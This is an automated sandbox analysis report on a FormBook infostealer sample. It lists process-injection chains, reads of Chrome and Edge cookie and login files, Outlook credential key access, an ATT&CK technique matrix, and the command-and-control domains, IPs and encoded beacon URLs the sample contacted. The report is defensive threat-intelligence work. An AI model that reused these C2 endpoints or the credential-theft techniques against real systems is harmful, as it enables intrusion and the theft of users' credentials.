Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 7708

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 842008

Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D58C93 LogonUserW,

0_2_00D58C93

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D03B4C

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00D04A35

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D64EC9 mouse_event,

0_2_00D64EC9

Source: C:\Users\user\AppData\Local\directory\.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2sgk6jMa2.exe"	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

0_2_00D581F7

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D64C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00D64C03

Source: N2sgk6jMa2.exe, .exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: .exe, fIuefTlcmxsHvlw.exe, 00000003.00000000.1860326279.0000000001890000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247697194.0000000001891000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004212117.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fIuefTlcmxsHvlw.exe, 00000003.00000000.1860326279.0000000001890000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247697194.0000000001891000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004212117.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fIuefTlcmxsHvlw.exe, 00000003.00000000.1860326279.0000000001890000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247697194.0000000001891000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004212117.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: fIuefTlcmxsHvlw.exe, 00000003.00000000.1860326279.0000000001890000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247697194.0000000001891000.00000002.00000001.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004212117.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D2886B cpuid

0_2_00D2886B

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00D350D7

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D42230 GetUserNameW,

0_2_00D42230

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D3418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00D3418A

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D04AFE

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: .exe	Binary or memory string: WIN_81
Source: .exe	Binary or memory string: WIN_XP
Source: .exe	Binary or memory string: WIN_XPe
Source: .exe	Binary or memory string: WIN_VISTA
Source: .exe	Binary or memory string: WIN_7
Source: .exe	Binary or memory string: WIN_8
Source: .exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D76596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00D76596
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D76A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00D76A5A
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BA6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	1_2_00BA6596
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BA6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	1_2_00BA6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	2 Native API	1 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	27 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	161 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	11 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
N2sgk6jMa2.exe	51%	Virustotal		Browse
N2sgk6jMa2.exe	53%	ReversingLabs	Win32.Trojan.Autoit
N2sgk6jMa2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\directory\.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\directory\.exe	53%	ReversingLabs	Win32.Trojan.Autoit

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
empowermedeco.com	12%	Virustotal	Browse
www.660danm.top	11%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse
www.kasegitai.tokyo	0%	Virustotal	Browse
elettrosistemista.zip	9%	Virustotal	Browse
www.shenzhoucui.com	9%	Virustotal	Browse
www.3xfootball.com	1%	Virustotal	Browse
www.goldenjade-travel.com	8%	Virustotal	Browse
www.b301.space	6%	Virustotal	Browse
www.magmadokum.com	9%	Virustotal	Browse
www.antonio-vivaldi.mobi	9%	Virustotal	Browse
www.techchains.info	11%	Virustotal	Browse
www.joyesi.xyz	2%	Virustotal	Browse
www.donnavariedades.com	6%	Virustotal	Browse
www.empowermedeco.com	5%	Virustotal	Browse
www.liangyuen528.com	2%	Virustotal	Browse
www.k9vyp11no3.cfd	8%	Virustotal	Browse
www.rssnewscast.com	9%	Virustotal	Browse
www.elettrosistemista.zip	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Avira URL Cloud	safe
https://reg.ru	0%	Avira URL Cloud	safe
https://donnavariedades.com/fo8o?aZ=l	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/?aZ=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&qD=FrMTb	100%	Avira URL Cloud	malware
http://www.empowermedeco.com/fo8o/?aZ=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&qD=FrMTb	100%	Avira URL Cloud	malware
http://www.shenzhoucui.com/fo8o/?qD=FrMTb&aZ=CKPof6WmPR8MjyGnH4DbgoSrXD0BQRGHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBUQctCnxeEn1N6dSVAag1SvMAJrrC6MpwI5I=	100%	Avira URL Cloud	malware
http://www.empowermedeco.com/fo8o/	8%	Virustotal		Browse
https://www.empowermedeco.com/fo8o/?aZ=mxnR	100%	Avira URL Cloud	malware
https://reg.ru	0%	Virustotal		Browse
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://push.zhanzhang.baidu.com/push.js	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/	100%	Avira URL Cloud	malware
https://track.uc.cn/collect	0%	Virustotal		Browse
https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto	0%	Virustotal		Browse
http://www.magmadokum.com/fo8o/	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/	0%	Avira URL Cloud	safe
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/	11%	Virustotal		Browse
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Virustotal		Browse
http://www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=	0%	Avira URL Cloud	safe
http://push.zhanzhang.baidu.com/push.js	1%	Virustotal		Browse
http://www.kasegitai.tokyo/fo8o/	100%	Avira URL Cloud	malware
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	0%	Virustotal		Browse
http://www.rssnewscast.com/fo8o/	8%	Virustotal		Browse
https://hm.baidu.com/hm.js?	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/	9%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Avira URL Cloud	safe
http://www.antonio-vivaldi.mobi/fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdnZ60ZUmbyLe/qr8s1uSeQEj8wGRnlWDvMs=&qD=FrMTb	0%	Avira URL Cloud	safe
https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am	0%	Avira URL Cloud	safe
http://www.shenzhoucui.com/fo8o/	100%	Avira URL Cloud	malware
http://www.goldenjade-travel.com/fo8o/	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Avira URL Cloud	safe
https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=	0%	Avira URL Cloud	safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&	0%	Avira URL Cloud	safe
http://www.antonio-vivaldi.mobi/fo8o/	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://zz.bdstatic.com/linksubmit/push.js	0%	Avira URL Cloud	safe
https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/	100%	Avira URL Cloud	malware
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
http://www.donnavariedades.com/fo8o/	0%	Avira URL Cloud	safe
https://musee.mobi/vivaldi/fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFx	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	0%	Avira URL Cloud	safe
https://www.sedo.com/services/parking.php3	0%	Avira URL Cloud	safe
http://www.b301.space/fo8o/?aZ=AU3XYvZFaGSlytwpVw8yOp8P3DTmtaA+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBKF09gVMhv/0PQsBNVEJ3Y6D3Cho3zWe+YcQ=&qD=FrMTb	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
https://codepen.io/uzcho_/pens/popular/?grid_type=list	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/?qD=FrMTb&aZ=tDTx8bBUOSgexthKGxTOnUCc0VRR9qJVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOeLTXcC8Q+8Ca4ZDKyYIpPg4REm9D5WLqa0=	100%	Avira URL Cloud	malware
https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs	0%	Avira URL Cloud	safe
https://codepen.io/uzcho_/pen/eYdmdXw.css	0%	Avira URL Cloud	safe
http://www.b301.space/fo8o/	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?qD=FrMTb&aZ=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=	100%	Avira URL Cloud	malware
https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a	0%	Avira URL Cloud	safe
http://www.rssnewscast.com/fo8o/?aZ=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&qD=FrMTb	0%	Avira URL Cloud	safe
http://www.b301.space	0%	Avira URL Cloud	safe
http://www.donnavariedades.com/fo8o/?aZ=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&qD=FrMTb	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.660danm.top	34.111.148.214	true	false	11%, Virustotal, Browse	unknown
empowermedeco.com	217.196.55.202	true	false	12%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	false	0%, Virustotal, Browse	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	0%, Virustotal, Browse	unknown
www.kasegitai.tokyo	202.172.28.202	true	false	0%, Virustotal, Browse	unknown
elettrosistemista.zip	195.110.124.133	true	false	9%, Virustotal, Browse	unknown
www.3xfootball.com	154.215.72.110	true	false	1%, Virustotal, Browse	unknown
www.shenzhoucui.com	104.206.198.212	true	false	9%, Virustotal, Browse	unknown
www.antonio-vivaldi.mobi	46.30.213.191	true	false	9%, Virustotal, Browse	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	8%, Virustotal, Browse	unknown
www.rssnewscast.com	91.195.240.94	true	false	9%, Virustotal, Browse	unknown
www.techchains.info	66.29.149.46	true	false	11%, Virustotal, Browse	unknown
www.b301.space	194.58.112.174	true	false	6%, Virustotal, Browse	unknown
www.magmadokum.com	unknown	unknown	true	9%, Virustotal, Browse	unknown
www.donnavariedades.com	unknown	unknown	true	6%, Virustotal, Browse	unknown
www.joyesi.xyz	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.liangyuen528.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.empowermedeco.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.k9vyp11no3.cfd	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.elettrosistemista.zip	unknown	unknown	true	7%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.empowermedeco.com/fo8o/	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.kasegitai.tokyo/fo8o/?aZ=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&qD=FrMTb	false	Avira URL Cloud: malware	unknown
http://www.empowermedeco.com/fo8o/?aZ=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&qD=FrMTb	true	Avira URL Cloud: malware	unknown
http://www.shenzhoucui.com/fo8o/?qD=FrMTb&aZ=CKPof6WmPR8MjyGnH4DbgoSrXD0BQRGHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBUQctCnxeEn1N6dSVAag1SvMAJrrC6MpwI5I=	false	Avira URL Cloud: malware	unknown
http://www.660danm.top/fo8o/	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.magmadokum.com/fo8o/	false	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
